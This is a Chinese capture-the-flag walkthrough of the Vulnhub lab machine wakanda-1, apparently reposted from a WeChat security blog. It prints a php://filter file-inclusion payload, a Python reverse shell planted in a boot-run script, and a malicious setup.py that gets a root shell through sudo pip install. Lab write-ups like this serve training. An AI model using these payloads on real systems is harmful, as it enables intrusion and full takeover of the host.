【渗透测试】wakanda-1通关手册

  • A+
所属分类:安全文章
【渗透测试】wakanda-1通关手册

【渗透测试】wakanda-1通关手册



【渗透测试】wakanda-1通关手册




0x01 信息搜集


首先扫描靶机的IP地址

【渗透测试】wakanda-1通关手册

端口扫描

 

nmap 192.168.1.8 -sV -v


【渗透测试】wakanda-1通关手册


指纹识别

【渗透测试】wakanda-1通关手册


访问主页

【渗透测试】wakanda-1通关手册


发现网站的制作者

【渗透测试】wakanda-1通关手册


0x02 漏洞挖掘


查看网页源代码,fr是法国,lang是语言

【渗透测试】wakanda-1通关手册

              

Get提交lang的值为fr,页面就变成了法语的

【渗透测试】wakanda-1通关手册



提交参数然后改变了页面的文字,那么我们可以尝试是否有文件包含漏洞


php:// 是一种协议名称php://filter/ 是一种访问本地文件的协议/read=convert.base64-encode/ 表示读取的方式是base64编码后resource=index.php表示目标文件为index.php


于是我们构造payload成功读取到base64编码后的index文件

?lang=php://filter/read=convert.base64-encode/resource=index

【渗透测试】wakanda-1通关手册


将获取到的信息进行base64解码,找到了一个密码

【渗透测试】wakanda-1通关手册



扫了目录没有发现后台,那么这个密码可能是靶机的登录密码

于是尝试登录

只是一个Pythonshell

【渗透测试】wakanda-1通关手册


生成交互式shell

【渗透测试】wakanda-1通关手册


找到第一个flag

【渗透测试】wakanda-1通关手册



0x03 操作系统提权


/home/devops发现了flag2,但是没有读的权限       

【渗透测试】wakanda-1通关手册

查看属于devops用户的文件

【渗透测试】wakanda-1通关手册

Devops所属的文件当前用户对他有读写权限

【渗透测试】wakanda-1通关手册

于是我们在里面写入一个bash,用来获取devopsshell(该程序在开机后会自动运行)

import socket  import subprocess  import os  s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)  s.connect(("192.168.1.64444os.dup2(s.fileno(),0)  os.dup2(s.fileno(),1)  os.dup2(s.fileno(),2)  p=subprocess.call(["/bin/sh","-i"])

保存后重启靶机,得到反弹的shell

【渗透测试】wakanda-1通关手册

生成交互式shell,查看flag2

【渗透测试】wakanda-1通关手册

还有一种方法,不需要拿用户的shell,由于脚本每隔五分钟运行一次。可以直接在脚本里写入把flag输出到文件里的代码

【渗透测试】wakanda-1通关手册

查看devops用户能够免密sudo的文件

【渗透测试】wakanda-1通关手册

在网上查找资料找到了exp

https://www.root4loot.com/post/pip-install-privilege-escalation/

【渗透测试】wakanda-1通关手册

from setuptools import setup  from setuptools.command.install import install  import base64  import os  
class CustomInstall(install): def run(self): install.run(self) RHOST = '192.168.1.6'    reverse_shell = 'python -c "import os; import pty; import socket; lhost = '%s'; lport = 5555; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv('HISTFILE', '/dev/null'); pty.spawn('/bin/bash'); s.close();"' % RHOST     encoded = base64.b64encode(reverse_shell)     os.system('echo %s|base64 -d|bash' % encoded)     setup(name='FakePip',        version='0.0.1',        description='This will exploit a sudoer able to /usr/bin/pip install *',        url='https://github.com/0x00-0x00/fakepip',        author='zc00l',        author_email='[email protected]',        license='MIT',        zip_safe=False,        cmdclass={'install': CustomInstall})


按照用法将该内容写进setup.py,上传到/tmp目录下。(反弹的devopsshell不好操作,我们用ssh mamadou用户)

【渗透测试】wakanda-1通关手册

写入exp(由于有执行权限的devops用户是用nc反弹出来的shell,用了4444端口。我们这里就用5555端口)

【渗透测试】wakanda-1通关手册

执行

sudo -H /usr/bin/pip install . --upgrade --force-reinstall


成功接收到反弹的root权限,拿下flag

【渗透测试】wakanda-1通关手册


靶场下载地址

https://pan.baidu.com/s/1_Uottec15kFygfOUt1NaGQ 提取码:p8h7






【渗透测试】wakanda-1通关手册


【渗透测试】wakanda-1通关手册

【渗透测试】wakanda-1通关手册

【渗透测试】Vulnhub 1.0通关手册

【漏洞复现】蓝凌0A后台密码读解密(附POC)

【渗透测试】hackthebox靶场之Ophiuchi

【渗透测试】hackthebox靶场之TheNotebook


【渗透测试】wakanda-1通关手册
【渗透测试】wakanda-1通关手册
微信搜一搜
【渗透测试】wakanda-1通关手册
暗魂攻防实验室


本文始发于微信公众号(暗魂攻防实验室):【渗透测试】wakanda-1通关手册

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: